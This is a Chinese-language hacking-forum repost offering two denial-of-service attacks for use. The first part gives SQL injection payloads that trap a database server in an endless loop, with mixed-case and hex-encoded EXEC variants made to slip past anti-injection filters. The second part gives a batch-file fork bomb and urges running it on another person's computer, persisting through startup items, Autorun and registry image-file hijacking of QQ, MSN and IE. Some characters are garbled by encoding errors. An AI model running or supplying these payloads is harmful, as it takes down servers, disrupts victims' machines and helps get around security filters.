注入死循環(huán)

    來源：華夏 同盟

    有時(shí)候，我們通過數(shù)據(jù)庫備份一個批處理到啟動菜單后，希望服務(wù)器在下次重啟時(shí)運(yùn)行我們的批處理，

令服務(wù)器重啟的死循環(huán)漏洞預(yù)警

    以下注入代碼讓服務(wù)器停止響應(yīng)，或響應(yīng)很慢，要取得更好的效果，請丟到注入點(diǎn)后多執(zhí)行幾次。最終管理員會重新啟動服務(wù)器。

    數(shù)字型注入點(diǎn)：

    ;wHiLe 1<9 bEgIn select cHaR(0) eNd--

    文本型注入點(diǎn)：

    ';wHiLe 1<9 bEgIn select cHaR(0) eNd--

    或者以 Declare + EXEC 的方式來執(zhí)行：

    ;dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--

    ';dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--

    以上代碼在數(shù)據(jù)庫服務(wù)器上制造死循環(huán)導(dǎo)致服務(wù)器資源被耗盡進(jìn)而拒絕服務(wù)。 管理員會幫你重啟服務(wù)器。

    注：以上代碼具有攻擊性，請謹(jǐn)慎使用。

    注：其中的 select char(0) 可以改成 select power(1.23456,100) 以加大計(jì)算量。

    -----------------夾煙占位--------------------

    ;wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--

    這句的意思是當(dāng)1小9開始將0這個反轉(zhuǎn)ASCII碼。因?yàn)槭呛愠闪⒌乃�以是個死循環(huán)。一直到機(jī)器資源用盡

    改字符大小是為了繞過網(wǎng)站的過濾防注入。

    ;declare @s varchar(8000) set @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 exec(@s)--

    declare @s varchar(8000)定義@s為varchar型長度8000。將“wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd”用HEX編碼后符值給@s，再用exec執(zhí)行。。

    作用同樣是繞過網(wǎng)站的過濾防注入

    ';wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--

    加'因?yàn)樗�是字符型注入。反正我是解說不清楚了。

    select power(1.23456,100)返回1.23456的100次方根，不死才怪呢

    concat函數(shù)就是將里邊的字符區(qū)別大小的的串聯(lián)起來，benchmark(9999999999999,md5('test')報(bào)告客戶端的運(yùn)行經(jīng)過時(shí)間，

電腦資料

    我不知道concat函數(shù)對攻擊起什么作用？ w hex編碼0x77 benchmark(9999999999999,md5(0x77) 這樣也許能繞過防注入

    亂寫一氣大牛見笑

    ----------------------------------------------------------------------------------------------------

    死循環(huán)之ping增強(qiáng)版

    來源：色蘿卜's bolg

    建議在虛擬機(jī)上試驗(yàn)

    或者在別人的電腦上運(yùn)行改批處理

    她可以讓她的電腦立馬無法響應(yīng)過來

    而不得不重啟機(jī)器

    如果你還毒的話可以把她放到啟動項(xiàng)中

    還毒的話加一個Autorun文件，open=這個批處理路徑

    再毒的話在注冊表中鏡像劫持掉，讓她點(diǎn)擊QQ、MSN、IE等常用工具既

    激活批處理

    讓她折騰去

    雙核也測試過，只能重啟，反映響應(yīng)比以前簡單的寫個

    loop循環(huán)還要強(qiáng)N倍

    呵呵

    還來不及敲shutdown -a

    關(guān)閉組等操作哦

    純屬娛樂

    對系統(tǒng)文件無傷害

    重啟后無礙

    附件中有我測試時(shí)的源文件，懶的話可以下載哦

    附源文件內(nèi)容

    注兩個文件解壓到同一目錄下

    啟動.bat

    @echo off

    color 2f

    echo.

    title 死循環(huán)之ping增強(qiáng)版-zzw制作

    echo ####################################################################

    echo # 死循環(huán)之ping增強(qiáng)版-zzw制作 #

    echo ####################################################################

    echo.

    :loop

    start zzw.bat

    goto :loop

    echo 啟動完成

    zzw.bat

    @echo off

    ping 127.0.0.1 -l 65500 -t

    附前人死循環(huán)批處理

    @echo off

    :loop

    start cmd.exe

    goto :loop

    當(dāng)然：有人會問為什么不把CMD.exe換成其他的應(yīng)用程序呢，可以的，但是前提你要知道她電腦有那些大的應(yīng)用軟件